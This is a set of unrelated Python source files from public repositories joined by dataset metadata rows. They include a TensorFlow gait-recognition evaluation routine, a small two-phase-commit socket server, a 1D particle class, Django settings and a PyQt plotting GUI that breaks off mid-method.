        total_num = 0
        rank_acc = {}
        ys = []
        preds = []
        accs = []
        cnt = 0
        Rank_1 = 0
        if dataset == 'IAS':
            print('### Validation Results on IAS-A: ')
        if manner == 'sc':
            # Batch-level evaluation: accumulate Rank-K hit counts from
            # the top-K logits of every sample.
            for batch_i, (y_batch, X_batch) in enumerate(
                    get_new_train_batches(y, X, batch_size)):
                loss, acc, pre = sess.run([cost, accuracy, pred],
                                          {X_input: X_batch,
                                           y_input: y_batch,
                                           lr: learning_rate})
                ys.extend(y_batch.tolist())
                preds.extend(pre.tolist())
                accs.append(acc)
                cnt += 1
                for i in range(y_batch.shape[0]):
                    for K in range(1, len(classes) + 1):
                        if K not in rank_acc.keys():
                            rank_acc[K] = 0
                        t = np.argpartition(pre[i], -K)[-K:]
                        if np.argmax(y_batch[i]) in t:
                            rank_acc[K] += 1
                correct_num += acc * batch_size
                total_num += batch_size
                print(
                    'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
                        .format(cnt,
                                loss,
                                acc,
                                ))
            for K in rank_acc.keys():
                rank_acc[K] /= total_num
            total_acc = correct_num / total_num
            Rank_1 = total_acc
            # print('Rank-1 Accuracy: %f' % total_acc)
            nAUC = cal_AUC(score_y=preds,pred_y=ys, ps='nAUC')
        else:
            # Sequence-level ('ap') evaluation: average frame logits over
            # each time_steps window whose labels agree, then score.
            all_frame_preds = []
            for batch_i, (y_batch, X_batch) in enumerate(
                    get_new_train_batches(y, X, batch_size)):
                loss, acc, pre = sess.run([cost, accuracy, pred],
                                          {X_input: X_batch,
                                           y_input: y_batch,
                                           lr: learning_rate})
                ys.extend(y_batch.tolist())
                preds.extend(pre.tolist())
                all_frame_preds.extend(pre)
                accs.append(acc)
                cnt += 1
                # for i in range(y_batch.shape[0]):
                #     for K in range(1, len(classes) + 1):
                #         if K not in rank_acc.keys():
                #             rank_acc[K] = 0
                #         t = np.argpartition(pre[i], -K)[-K:]
                #         if np.argmax(y_batch[i]) in t:
                #             rank_acc[K] += 1
                # correct_num += acc * batch_size
                # total_num += batch_size
                # print(
                #     'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
                #         .format(cnt,
                #                 loss,
                #                 acc,
                #                 ))
            # for K in rank_acc.keys():
            #     rank_acc[K] /= total_num
            sequence_pred_correct = 0
            sequence_num = 0
            sequence_preds = []
            sequence_ys = []
            rank_acc = {}
            for k in range(len(all_frame_preds) // time_steps):
                sequence_labels = np.argmax(y[k * time_steps: (k + 1) * time_steps], axis=1)
                # print(sequence_labels)
                if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
                    frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
                    sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
                    temp_pred = np.average(frame_predictions, axis=0)
                    for K in range(1, len(classes) + 1):
                        if K not in rank_acc.keys():
                            rank_acc[K] = 0
                        t = np.argpartition(temp_pred, -K)[-K:]
                        if sequence_labels[0] in t:
                            rank_acc[K] += 1
                    if sequence_pred == sequence_labels[0]:
                        sequence_pred_correct += 1
                    sequence_num += 1
                    sequence_ys.append(sequence_labels[0])
                    aver = np.average(frame_predictions, axis=0)
                    sequence_preds.append(aver)
            for K in rank_acc.keys():
                rank_acc[K] /= sequence_num
            seq_acc_t = sequence_pred_correct / sequence_num
            # total_acc = correct_num / total_num
            # print('(Frame) Rank-1 Accuracy: %f' % total_acc)
            Rank_1 = seq_acc_t
            sequence_ys = label_binarize(sequence_ys, classes=classes)
            # cal_AUC(score_y=preds,pred_y=ys, ps='nAUC')
            nAUC = cal_AUC(score_y=sequence_preds, pred_y=sequence_ys, ps='nAUC')
        print('### Rank-n Accuracy: ')
        print(rank_acc)
        print('### Rank-1 Accuracy: %f' % Rank_1)
        print('### nAUC: ' + str(nAUC))
    # Second pass for IAS: evaluate the IAS-B split with its own best
    # checkpoint.
    if dataset == 'IAS':
        checkpoint = model_dir + "/B_trained_model.ckpt"
        loaded_graph = tf.get_default_graph()
        nAUC = 0
        with tf.Session(graph=loaded_graph, config=config) as sess:
            loader = tf.train.import_meta_graph(checkpoint + '.meta')
            loader.restore(sess, checkpoint)
            X_input = loaded_graph.get_tensor_by_name('X_input:0')
            y_input = loaded_graph.get_tensor_by_name('y_input:0')
            lr = loaded_graph.get_tensor_by_name('learning_rate:0')
            pred = loaded_graph.get_tensor_by_name('add_1:0')
            cost = loaded_graph.get_tensor_by_name('new_train/Mean:0')
            accuracy = loaded_graph.get_tensor_by_name('new_train/Mean_1:0')
            correct_num = 0
            total_num = 0
            rank_acc = {}
            ys = []
            preds = []
            accs = []
            cnt = 0
            Rank_1 = 0
            print('### Validation Results on IAS-B: ')
            # IAS-B
            if manner == 'sc':
                correct_num = 0
                total_num = 0
                rank_acc = {}
                ys = []
                preds = []
                accs = []
                cnt = 0
                for batch_i, (y_batch, X_batch) in enumerate(
                        get_new_train_batches(y_2, X_2, batch_size)):
                    loss, acc, pre = sess.run([cost, accuracy, pred],
                                              {X_input: X_batch,
                                               y_input: y_batch,
                                               lr: learning_rate})
                    ys.extend(y_batch.tolist())
                    preds.extend(pre.tolist())
                    accs.append(acc)
                    cnt += 1
                    for i in range(y_batch.shape[0]):
                        for K in range(1, len(classes) + 1):
                            if K not in rank_acc.keys():
                                rank_acc[K] = 0
                            t = np.argpartition(pre[i], -K)[-K:]
                            if np.argmax(y_batch[i]) in t:
                                rank_acc[K] += 1
                    correct_num += acc * batch_size
                    total_num += batch_size
                    # print(
                    #     'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
                    #         .format(cnt,
                    #                 loss,
                    #                 acc,
                    #                 ))
                for K in rank_acc.keys():
                    rank_acc[K] /= total_num
                total_acc = correct_num / total_num
                Rank_1 = total_acc
                # print('Rank-1 Accuracy: %f' % total_acc)
                nAUC = cal_AUC(score_y=preds, pred_y=ys, ps='nAUC')
            else:
                all_frame_preds = []
                for batch_i, (y_batch, X_batch) in enumerate(
                        get_new_train_batches(y_2, X_2, batch_size)):
                    loss, acc, pre = sess.run([cost, accuracy, pred],
                                              {X_input: X_batch,
                                               y_input: y_batch,
                                               lr: learning_rate})
                    ys.extend(y_batch.tolist())
                    preds.extend(pre.tolist())
                    accs.append(acc)
                    all_frame_preds.extend(pre)
                    cnt += 1
                    # for i in range(y_batch.shape[0]):
                    #     for K in range(1, len(classes) + 1):
                    #         if K not in rank_acc.keys():
                    #             rank_acc[K] = 0
                    #         t = np.argpartition(pre[i], -K)[-K:]
                    #         if np.argmax(y_batch[i]) in t:
                    #             rank_acc[K] += 1
                    # # correct_num += acc * batch_size
                    # total_num += batch_size
                    # print(
                    #     'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
                    #         .format(cnt,
                    #                 loss,
                    #                 acc,
                    #                 ))
                # for K in rank_acc.keys():
                #     rank_acc[K] /= total_num
                sequence_pred_correct = 0
                sequence_num = 0
                sequence_preds = []
                sequence_ys = []
                rank_acc = {}
                for k in range(len(all_frame_preds) // time_steps):
                    sequence_labels = np.argmax(y_2[k * time_steps: (k + 1) * time_steps], axis=1)
                    if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
                        frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
                        sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
                        temp_pred = np.average(frame_predictions, axis=0)
                        for K in range(1, len(classes) + 1):
                            if K not in rank_acc.keys():
                                rank_acc[K] = 0
                            t = np.argpartition(temp_pred, -K)[-K:]
                            if sequence_labels[0] in t:
                                rank_acc[K] += 1
                        if sequence_pred == sequence_labels[0]:
                            sequence_pred_correct += 1
                        sequence_num += 1
                        sequence_ys.append(sequence_labels[0])
                        aver = np.average(frame_predictions, axis=0)
                        sequence_preds.append(aver)
                for K in rank_acc.keys():
                    rank_acc[K] /= sequence_num
                seq_acc_t = sequence_pred_correct / sequence_num
                Rank_1 = seq_acc_t
                # total_acc = correct_num / total_num
                # print('(Frame) Rank-1 Accuracy: %f' % total_acc)
                # print('Rank-1 Accuracy: %f' % seq_acc_t)
                sequence_ys = label_binarize(sequence_ys, classes=classes)
                # cal_AUC(score_y=preds, pred_y=ys, ps='nAUC')
                nAUC = cal_AUC(score_y=sequence_preds, pred_y=sequence_ys, ps='nAUC')
            print('### Rank-n Accuracy: ')
            print(rank_acc)
            print('### Rank-1 Accuracy: %f' % Rank_1)
            print('### nAUC: ' + str(nAUC))
from sklearn.preprocessing import label_binarize
from sklearn.metrics import roc_curve, auc
def cal_AUC(scores, labels, ps):
    """Compute and print the micro-averaged ROC AUC.

    Flattens the score and label matrices, builds a single micro-average
    ROC curve with sklearn, and prints "<ps>: <auc>".
    """
    score_arr = np.array(scores)
    label_arr = np.array(labels)
    fpr, tpr, _thresholds = roc_curve(label_arr.ravel(), score_arr.ravel())
    roc_auc = auc(fpr, tpr)
    print(ps + ': ' + str(roc_auc))
# Script entry point: tf.app.run() parses TF flags and invokes main().
if __name__ == '__main__':
    tf.app.run()
| [
"wang.shuxi@outlook.com"
] | wang.shuxi@outlook.com |
9d1fb42471abeeb801d4ba9a1bfad944700ce406 | 12c3cee16358928e4f00120fb45b43448c4a64d1 | /hello.py | d2b6e1ff2b8beef1dc14b50c173c8a067af81d34 | [] | no_license | stifalex/py1 | dc643a4f53c64ef15fb280d80aca67fd60ccd108 | bd467b85377c6aa79ffcad1e65f18b263773842d | refs/heads/master | 2020-05-31T23:55:35.384306 | 2019-06-17T10:53:01 | 2019-06-17T10:53:01 | 190,547,366 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 59 | py | x=int(input())
m=1
while m<=x:
m+=1
print("hello")
| [
"noreply@github.com"
] | stifalex.noreply@github.com |
15dc4ff64abd92df677bf9a8ef641da64b92adda | d77eb6ee080e59c83e102a76e9476e51e0184fe7 | /server3.py | 3559324adde8de1b97d067cb81a5621bff29d710 | [] | no_license | ricatosin/2PC | ce0acff4d225ef3d8c28e7bef5bdac4027816463 | 027f8745516cc8d3658a826efefba00cda5d9e39 | refs/heads/master | 2020-03-24T19:20:46.919514 | 2018-07-30T19:53:13 | 2018-07-30T19:53:13 | 142,920,796 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,969 | py | ##########################################################
##Codigo cliente escrito por Ricardo Tosin ###############
##########################################################
import socket
import sys
import datetime
import time
from thread import *
logServer3 = open('logServer3.txt','w') # Abre arquivo escrita do logServer3
datelog = datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p") #Etiqueta de tempo para organizar log por data e hora
#VARIAVEL DE CONTROLE DE MODIFICACAO
pode_Alterar = False
storage_server = 0 #Variavel que armazena o valor a ser alterado
HOST = '127.0.0.1' # Significa todas as interfaces disponiveis
PORT = 8888 # Porta Arbitraria nao Privilegiada
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket Criado'
#Binda o Socket para porta local
try:
s.bind((HOST, PORT))
except socket.error , msg:
print 'Falha no Bind. Error Code : ' + str(msg[0]) + ' Mensagem: ' + msg[1]
sys.exit()
print 'Socket bind SERVER 3 completo'
#Comeca a escutar o Socket de Rede
#Valor 10 s.listen() limita a conexao ate 10 ou seja a 11 ira ser recusada.
s.listen(10)
print 'Escutando Socket'
logServer3.write(datelog + '---->' + 'Servidor 1 com IP :' + HOST + 'Iniciado na porta: ' + str(PORT) + '\n')
#Funcao para lidar com as conexoes e criar Threads
def clientthread(conn):
    """Handle one client connection of the 2PC protocol.

    Receives commands ('commit', 'altera', 'abort') until a terminating
    command or disconnect, logging each step, then clears the busy flag
    and closes the connection. Runs in its own thread (start_new_thread).
    """
    global pode_Alterar
    # Greet the connected client.
    conn.send('ok') #String only
    # Loop until a terminating command or the client disconnects.
    while True:
        # Receive the next command from the client.
        data = conn.recv(1024)
        if (data == 'commit'):
            logServer3.write(datelog + '---->' + 'OK ENVIADO AO CLIENTE : '+ addr[0] + ':' + str(addr[1])+ '\n')
            pode_Alterar = True
            time.sleep(3)
            reply = 'commit'
            conn.sendall(reply)
            break
        if (data == 'altera'):
            logServer3.write(datelog + '---->' + 'ALTERANDO DADOS PARA O CLIENTE: ' + addr[0] + ':' + str(addr[1]) + '\n')
            pode_Alterar = True
            time.sleep(3)
            # NOTE(review): assigns a function-local, not the module-level
            # storage_server (no 'global storage_server') — confirm intent.
            storage_server = 1;
            logServer3.write(datelog + '---->' + 'DADO STORAGE MODIFICADO PARA CLIENTE: '+ addr[0] + ':' + str(addr[1]) + '\n' )
            # NOTE(review): reply is set but never sent in this branch
            # (no conn.sendall before break) — confirm protocol intent.
            reply = 'commit'
            break
        if (data == 'abort'):
            logServer3.write(datelog + '---->' + 'TENTATIVA DE ALTERAR FALHOU NO CLIENTE :' + addr[0] + ':' + str(addr[1]) + '\n')
        elif not data:
            break
    # Connection handled: free the busy flag so new clients are accepted.
    # NOTE(review): addr is the module-level variable set by the accept
    # loop — with concurrent clients the logged address may be stale.
    pode_Alterar = False
    # Leaving the loop: close this client's connection.
    conn.close()
#Continua Conectando com Clientes
while 1:
#Espera para aceitar a conexao - blocking call
if (pode_Alterar == True):
conn, addr = s.accept()
conn.send("NOK") # CASO JA EXISTA UMA CONEXAO ATIVA ENVIA ABORT AO CLIENTE
conn.close()
if (pode_Alterar == False):
conn, addr = s.accept()
logServer3.write(datelog + '---->' + 'ABERTA CONEXAO COM CLIENTE : ' + addr[0] + ':' + str(addr[1]) + '\n')
print 'Connectado com ' + addr[0] + ':' + str(addr[1])
#Inicia a Thread.
pode_Alterar == True
start_new_thread(clientthread, (conn,))
logServer3.close()
s.close()
| [
"noreply@github.com"
] | ricatosin.noreply@github.com |
c553d74eaa132d25fe4fc5ed0e0a10d05a9ff9e5 | f2a55f94783fed2a53bc2ff1a0096cfdb75dc5a3 | /3rd Year Diatomic Simulation Exercise/Particle1D.py | 9b7e688d4446b103fb241661e708022f216dd910 | [] | no_license | callous4567/UoE-Projects | c7b307878ae1d6b7e00227bb1a681aec2ad55b1f | 5a4ee803f70f7da9d860f905114a71278c7f50e7 | refs/heads/master | 2023-02-18T22:19:25.496429 | 2023-02-13T01:00:19 | 2023-02-13T01:00:19 | 245,646,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,034 | py | """
CMod Ex2: Particle1D, a class to describe 1D particles
"""
class Particle1D(object):
"""
Class to describe 1D particles.
Properties:
position(float) - position along the x axis
velocity(float) - velocity along the x axis
mass(float) - particle mass
Methods:
* formatted output
* kinetic energy
* first-order velocity update
* first- and second order position updates
"""
def __init__(self, pos, vel, mass):
"""
Initialise a Particle1D instance
:param pos: position as float
:param vel: velocity as float
:param mass: mass as float
"""
self.position = pos
self.velocity = vel
self.mass = mass
def __str__(self):
"""
Define output format.
For particle p=(2.0, 0.5, 1.0) this will print as
"x = 2.0, v = 0.5, m = 1.0"
"""
return "x = " + str(self.position) + ", v = " + str(self.velocity) + ", m = " + str(self.mass)
def kinetic_energy(self):
"""
Return kinetic energy as
1/2*mass*vel^2
"""
return 0.5*self.mass*self.velocity**2
# Time integration methods
def leap_velocity(self, dt, force):
"""
First-order velocity update,
v(t+dt) = v(t) + dt*F(t)
:param dt: timestep as float
:param force: force on particle as float
"""
self.velocity += dt*force/self.mass
def leap_pos1st(self, dt):
"""
First-order position update,
x(t+dt) = x(t) + dt*v(t)
:param dt: timestep as float
"""
self.position += dt*self.velocity
def leap_pos2nd(self, dt, force):
"""
Second-order position update,
x(t+dt) = x(t) + dt*v(t) + 1/2*dt^2*F(t)
:param dt: timestep as float
:param force: current force as float
"""
self.position += dt*self.velocity + 0.5*dt**2*force/self.mass
hey = Particle1D()
print(hey.position)
| [
"plasmolian@gmail.com"
] | plasmolian@gmail.com |
d2797398c8da6c4fb49aafc3d736a1391d150f12 | b6f0b3932f8cdee542f3f1fe7f5c27c67e5d1c2d | /conf/train_conf_dense_7.py | 1c88e9db0a9644002cbed124c0e05c35b5d75b9d | [] | no_license | fuding/codes_for_sicheng | dcab85b66d9f3a0f0c78c5e471223d919a3d14f7 | c8ba21572921ba0aa9686174305ab48fa614cd5d | refs/heads/master | 2022-02-26T16:32:01.253870 | 2019-10-11T06:10:27 | 2019-10-11T06:10:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,453 | py | from easydict import EasyDict
def get_config():
conf = EasyDict()
conf.arch = "dense_7"
conf.model = "MultiHDR"
conf.model_name = conf.arch + ""
conf.use_cpu = False
conf.is_train = True
conf.gpu_ids = [0]
conf.epoch = 400
conf.start_epoch = 0
conf.learning_rate = 0.0002
conf.beta1 = 0.5
conf.loss = 'l2' # l1 or l2
conf.lr_scheme = "MultiStepLR"
conf.lr_steps = [100 * 2387]
conf.lr_gamma = 0.1
conf.dataset_dir = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/"
conf.exp_path = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/exp.json"
conf.dataset_name = 'Multi_LDR_HDR'
conf.batch_size = 8
conf.load_size = 256
conf.fine_size = 256
conf.c_dim = 3
conf.num_shots = 3
conf.n_workers = 4
conf.use_shuffle = True
conf.use_tb_logger = True
conf.experiments_dir = "../../experiments/" + conf.model_name
conf.log_dir = "../../tb_logger/" + conf.model_name
conf.save_freq = 2000
conf.print_freq = 200
# conf.resume_step = 78000
# conf.pretrained = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/models/' + str(
# conf.resume_step) + '_G.pth'
# conf.resume = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/training_state/' + str(
# conf.resume_step) + '.state'
conf.pretrained = None
conf.resume = None
return conf | [
"907682447@qq.com"
] | 907682447@qq.com |
e7135cb72e171a176efe25678a61ae2c7c00da2f | e7e1dc27c9c6b844bb585d09c6660eb8877d0551 | /guodongba/views.py | 17993c976e4dfd1d562a36d34f30e6116fe8ac5c | [] | no_license | Guo-Dong-Ba-Team/guodongba-server | 362df7e47dcabd1cbae56829388c6844019b9f48 | 81727dc57d60e209d101bf5e88b22967824a310b | refs/heads/master | 2021-01-10T17:46:53.599733 | 2015-12-19T14:47:35 | 2015-12-19T14:47:35 | 44,010,066 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | from django.shortcuts import render_to_response
def home_page(request):
return render_to_response('index.html')
def agreement(request):
return render_to_response('agreement.html')
| [
"wangyf11@mail.ustc.edu.cn"
] | wangyf11@mail.ustc.edu.cn |
e00c10016ee6c187142737795c5e17c68a17937a | 25022cc3cff8a31cead2dc17b5c40fef1f9825c2 | /0x03-python-data_structures/10-divisible_by_2.py | 7111e75bd74335da6bbb1af23df54257d2211d0a | [] | no_license | 821-N/holbertonschool-higher_level_programming | 699032f42d5a94065c63c453774c532945e5807c | bfd43a2919c1d2cf63d964a1ded41e2252e83ccd | refs/heads/master | 2020-07-23T18:38:49.325003 | 2020-02-14T04:56:43 | 2020-02-14T04:56:43 | 207,669,574 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | #!/usr/bin/python3
def divisible_by_2(my_list=[]):
new = []
for item in my_list:
new += [item % 2 == 0]
return new
| [
"nathaniel.marofsky@gmail.com"
] | nathaniel.marofsky@gmail.com |
7c0dc62998969fe32e1394a1fe83e7c256fb1e99 | 4c1a5ae2d8cc13a2438fe8eac0529a1cb9fe847b | /server/settings.py | f0a074c8d677ac61c92dbbfe11c15c57e1f2da47 | [] | no_license | Alex2Pena/Docker-blog | 8d381d5ccf29b806ae8165109dbc4c9ccca085a3 | 6637f7ae7677b89e1005299279a2086e8c1691c7 | refs/heads/main | 2023-02-08T02:56:02.118544 | 2020-12-29T16:47:24 | 2020-12-29T16:47:24 | 323,504,916 | 0 | 0 | null | 2020-12-29T16:47:25 | 2020-12-22T02:57:41 | null | UTF-8 | Python | false | false | 3,485 | py | """
Django settings for server project.
Generated by 'django-admin startproject' using Django 3.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import environ
env = environ.Env(
# set casting, default value
DEBUG=(bool, False)
)
# reading .env file
environ.Env.read_env()
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env('DEBUG', False)
ALLOWED_HOSTS = tuple(env.list('ALLOWED_HOSTS'))
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# My Apps
'notes.apps.NotesConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'server.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': BASE_DIR / 'db.sqlite3',
# }
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': env('DB_NAME'),
'USER': env('DB_USER'),
'PASSWORD': env('DB_PASSWORD'),
'HOST': 'db',
'PORT': 5432,
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"attn.alex.p@gmail.com"
] | attn.alex.p@gmail.com |
83b668e0c8e813fb1fa0f21402c55b6211e0113c | 15ec2f9208d011097a02fd997df0fedd3c6311a1 | /data_exploration_gui/plot.py | 82534ae177b9af5a8ffa3ff7054f6337da908353 | [
"MIT"
] | permissive | int-brain-lab/iblapps | 95110bec8b9de2e1e41808086897ac0cd663d59c | e3e5a90fd4c60ef94fc87dd60f9de0307b51ab5f | refs/heads/master | 2023-08-09T14:48:01.876042 | 2023-07-25T09:34:14 | 2023-07-25T09:34:14 | 233,610,481 | 13 | 13 | MIT | 2023-09-01T10:02:17 | 2020-01-13T14:09:51 | Python | UTF-8 | Python | false | false | 15,749 | py | from PyQt5 import QtGui
import pyqtgraph as pg
import pyqtgraph.dockarea
from data_exploration_gui.utils import (MAP_SORT_OPTIONS, MAP_SIDE_OPTIONS, MAP_CHOICE_OPTIONS,
PSTH_OPTIONS, RASTER_OPTIONS, colours)
import atlaselectrophysiology.ColorBar as cb
import numpy as np
class PlotGroup:
def __init__(self, data_model):
self.data = data_model
self.create_dock_area()
self.fig_spike_psth = PlotTemplate('Time After Event (s)', 'Firing Rate (Hz)')
self.fig1_area.addWidget(self.fig_spike_psth.fig)
self.fig_behav_psth = PlotTemplate('Time After Event (s)', 'Firing Rate (Hz)')
self.fig2_area.addWidget(self.fig_behav_psth.fig)
self.fig_spike_raster = ScatterTemplate('Time After Event (s)', 'No. of Trials')
self.fig3_area.addWidget(self.fig_spike_raster.fig)
self.fig_behav_raster = ImageTemplate('Time After Event (s)', 'No. of Trials')
self.fig4_area.addWidget(self.fig_behav_raster.fig)
self.fig_autocorr = BarTemplate('Time (ms)', 'Corr')
self.fig5_area.addWidget(self.fig_autocorr.fig)
self.fig_template = PlotTemplate('Time (ms)', 'V (uV)')
self.fig6_area.addWidget(self.fig_template.fig)
self.plot_status = {key: False for key in MAP_SORT_OPTIONS.keys()}
def create_dock_area(self):
self.fig_area = pg.dockarea.DockArea()
self.fig1_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig2_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig3_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig4_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig5_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig6_area = pg.dockarea.Dock('', autoOrientation='horizontal')
self.fig_area.addDock(self.fig2_area, 'top')
self.fig_area.addDock(self.fig1_area, 'left', self.fig2_area)
self.fig_area.addDock(self.fig3_area, 'bottom', self.fig1_area)
self.fig_area.addDock(self.fig4_area, 'bottom', self.fig2_area)
self.fig_area.addDock(self.fig5_area, 'right')
self.fig_area.addDock(self.fig6_area, 'bottom', self.fig5_area)
self.fig3_area.setStretch(x=1, y=18)
self.fig4_area.setStretch(x=1, y=18)
self.fig5_area.setStretch(x=10, y=1)
self.fig6_area.setStretch(x=10, y=1)
def change_rasters(self, trial_set, contrast, order, sort, hold, event):
side = MAP_SIDE_OPTIONS[trial_set]
choice = MAP_CHOICE_OPTIONS[trial_set]
if hold and trial_set != 'all':
spike_raster, behav_raster = self.data.get_rasters_for_selection('all', 'all', order,
sort, contrast, event)
raster_options = RASTER_OPTIONS['all'][sort]
else:
spike_raster, behav_raster = self.data.get_rasters_for_selection(side, choice, order,
sort, contrast, event)
raster_options = RASTER_OPTIONS[trial_set][sort]
self.fig_spike_raster.remove_regions()
self.fig_spike_raster.plot(spike_raster.raster, spike_raster.time, spike_raster.n_trials)
self.fig_spike_raster.add_regions(spike_raster.dividers, raster_options)
self.fig_behav_raster.remove_regions()
self.fig_behav_raster.plot(behav_raster.raster, behav_raster.time, cmap=behav_raster.cmap,
clevels=behav_raster.clevels)
self.fig_behav_raster.add_regions(behav_raster.dividers, raster_options)
def change_psths(self, trial_set, contrast, order, sort, event):
side = MAP_SIDE_OPTIONS[trial_set]
choice = MAP_CHOICE_OPTIONS[trial_set]
spike_psth, behav_psth = self.data.get_psths_for_selection(side, choice, order,
sort, contrast, event)
self.fig_spike_psth.plot(trial_set, spike_psth.time, spike_psth.psth_mean,
spike_psth.psth_std, PSTH_OPTIONS[trial_set],
ylabel=spike_psth.ylabel)
self.fig_behav_psth.plot(trial_set, behav_psth.time, behav_psth.psth_mean,
behav_psth.psth_std, PSTH_OPTIONS[trial_set],
ylabel=behav_psth.ylabel)
def change_plots(self, contrast, trial_set, order, sort, hold, event):
self.plot_status[trial_set] = True
if not hold:
self.remove_plots(self.prev_trial_set)
self.change_rasters(trial_set, contrast, order, sort, hold, event)
self.change_psths(trial_set, contrast, order, sort, event)
self.prev_trial_set = trial_set
def change_all_plots(self, contrast, trial_set, order, sort, hold, event):
n_plots = np.sum(list(self.plot_status.values()))
if n_plots == 0:
self.change_psths(trial_set, contrast, order, sort, event)
self.plot_status[trial_set] = True
else:
for key, val in self.plot_status.items():
if val:
self.remove_plots(key)
self.change_psths(key, contrast, order, sort, event)
self.plot_status[key] = True
self.change_rasters(trial_set, contrast, order, sort, hold, event)
autocorr = self.data.get_autocorr_for_selection()
self.fig_autocorr.plot(autocorr.time, autocorr.vals)
template = self.data.get_template_for_selection()
self.fig_template.plot_line(template.time, template.vals)
self.prev_trial_set = trial_set
def remove_plots(self, trial_set):
self.plot_status[trial_set] = False
self.fig_spike_psth.remove_item(trial_set)
self.fig_behav_psth.remove_item(trial_set)
def reset(self):
for key, val in self.plot_status.items():
if val:
self.remove_plots(key)
self.fig_spike_raster.reset()
self.fig_behav_raster.reset()
self.fig_autocorr.reset()
class PlotTemplate:
def __init__(self, xlabel, ylabel, single=True):
self.fig = pg.PlotWidget(background='w')
self.fig.setMouseEnabled(x=False, y=False)
self.fig.setLabel('bottom', xlabel)
self.fig.setLabel('left', ylabel)
self.plot_items = dict()
if single:
self.plot_item = pg.PlotCurveItem()
self.fig.addItem(self.plot_item)
else:
self.fig.plotItem.addLine(x=0, pen=colours['line'])
def add_item(self, trial_set, yrange):
if trial_set not in self.plot_items.keys():
curve = {'centre': pg.PlotCurveItem(),
'upper': pg.PlotCurveItem(),
'lower': pg.PlotCurveItem(),
'fill': pg.FillBetweenItem(),
'yrange': yrange}
self.plot_items[trial_set] = curve
self.fig.addItem(self.plot_items[trial_set]['centre'])
self.fig.addItem(self.plot_items[trial_set]['fill'])
def remove_item(self, trial_set):
self.fig.removeItem(self.plot_items[trial_set]['centre'])
self.fig.removeItem(self.plot_items[trial_set]['fill'])
self.plot_items.pop(trial_set)
def plot(self, trial_set, x, y, se, plot_info, ylabel=None):
self.add_item(trial_set, [np.nanmin(y - se), np.nanmax(y + se)])
self.plot_items[trial_set]['centre'].setData(x=x, y=y)
self.plot_items[trial_set]['centre'].setPen(plot_info['colour'])
self.plot_items[trial_set]['lower'].setData(x=x, y=y - se)
